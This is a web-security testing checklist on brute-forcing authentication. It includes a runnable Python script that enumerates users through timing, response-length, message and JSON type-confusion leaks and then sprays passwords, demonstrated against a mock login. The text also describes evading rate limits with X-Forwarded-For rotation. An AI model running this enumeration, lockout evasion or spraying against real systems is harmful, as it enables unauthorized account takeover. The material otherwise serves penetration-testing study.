Brute-Force Authentication
  1. Test for brute-force protection by submitting a very long password (several thousand characters) together with a list of candidate usernames. Look for clues in the status code, Content-Length, error messages (use a negative search, i.e. filter out the common failure response) or response times that might indicate user enumeration: a long password is only expensive to hash when the account exists, so a timing gap between known and unknown users is a strong signal.
  2. If the login takes a JSON body, change the password from a string to a number (or another non-string type) where the schema allows it, and check whether the error message differs between existing and non-existent accounts. A type error that is raised only on the password-hashing path can also enable user enumeration.
  3. Bypass the brute-force protection if one is implemented (for example, if it keys on the source IP or on the exact username string, try headers such as X-Forwarded-For or case and encoding variations of the username).
  4. Brute-force usernames and passwords, or only passwords for the usernames enumerated in the previous steps. Where a per-account lockout exists, spray one password across all users per round rather than many passwords against one user.
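
The four steps above as one runnable script, added here as an example and not part of the original checklist. The login target is a constructed mock (`mock_login`, with the hypothetical accounts `alice` and `bob`) that leaks account existence through Content-Length, the error message, response time and a JSON type error; against a real target you would replace `mock_login` with a `send` function that POSTs the payload and records the elapsed time. The canary username and the `3x` timing threshold are assumptions, not values from the page.

```python
import json
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Response:
    status: int
    body: str
    elapsed: float  # seconds, as measured by the client

    @property
    def length(self) -> int:
        return len(self.body)


# ---- Constructed target: stands in for the real login endpoint --------------
# Hypothetical accounts; the mock leaks existence the way a careless backend does.
_ACCOUNTS = {"alice": "Winter2024!", "bob": "hunter2"}
_GENERIC = json.dumps({"error": "Invalid username or password"})


def mock_login(payload: dict) -> Response:
    user = payload.get("username")
    password = payload.get("password")
    if not isinstance(password, str):
        # Type confusion (step 2): only existing users reach the hashing code path.
        if user in _ACCOUNTS:
            return Response(500, json.dumps({"error": "password must be a string"}), 0.010)
        return Response(401, _GENERIC, 0.010)
    if user not in _ACCOUNTS:
        # Unknown user: returns immediately, nothing is hashed.
        return Response(401, _GENERIC, 0.010)
    # Known user: hashing cost grows with password length (step 1's long password).
    elapsed = 0.080 + len(password) / 10_000
    if _ACCOUNTS[user] == password:
        return Response(200, json.dumps({"token": "constructed-session-token"}), elapsed)
    return Response(401, json.dumps({"error": "Wrong password"}), elapsed)


# ---- Steps 1 and 2: user enumeration probes ---------------------------------
LONG_PASSWORD = "A" * 5000
CANARY = "zz_no_such_user_zz"  # assumed not to exist; every real user is compared to it


def probe(send: Callable[[dict], Response], usernames: List[str]) -> Dict[str, List[str]]:
    """Return, per username, the clues that distinguish it from the canary user."""
    base_long = send({"username": CANARY, "password": LONG_PASSWORD})
    base_type = send({"username": CANARY, "password": 12345})
    findings: Dict[str, List[str]] = {}
    for user in usernames:
        clues = []
        r = send({"username": user, "password": LONG_PASSWORD})
        if r.status != base_long.status:
            clues.append("status")
        if r.length != base_long.length:
            clues.append("content-length")
        if r.body != base_long.body:
            clues.append("message")
        if r.elapsed > 3 * base_long.elapsed:  # assumed threshold; sample several times for real targets
            clues.append("timing")
        t = send({"username": user, "password": 12345})
        if (t.status, t.body) != (base_type.status, base_type.body):
            clues.append("json-type")
        if clues:
            findings[user] = clues
    return findings


# ---- Step 4: password spraying over the enumerated users --------------------
def spray(send: Callable[[dict], Response], usernames: List[str],
          passwords: List[str]) -> Dict[str, str]:
    """One password per round across all users, which stays under a per-account lockout."""
    hits: Dict[str, str] = {}
    for password in passwords:
        for user in usernames:
            if user in hits:
                continue
            if send({"username": user, "password": password}).status == 200:
                hits[user] = password
    return hits


if __name__ == "__main__":
    found = probe(mock_login, ["alice", "bob", "carol"])
    print("enumeration clues:", found)
    print("valid credentials:", spray(mock_login, list(found), ["Password1", "hunter2", "Winter2024!"]))
```

Only usernames that produced at least one clue are fed into `spray`, so the wordlist is spent on accounts that are known to exist. For step 3 the real `send` wrapper is the place to add bypass attempts (rotating `X-Forwarded-For`, varying username case), since the probing and spraying logic does not need to change.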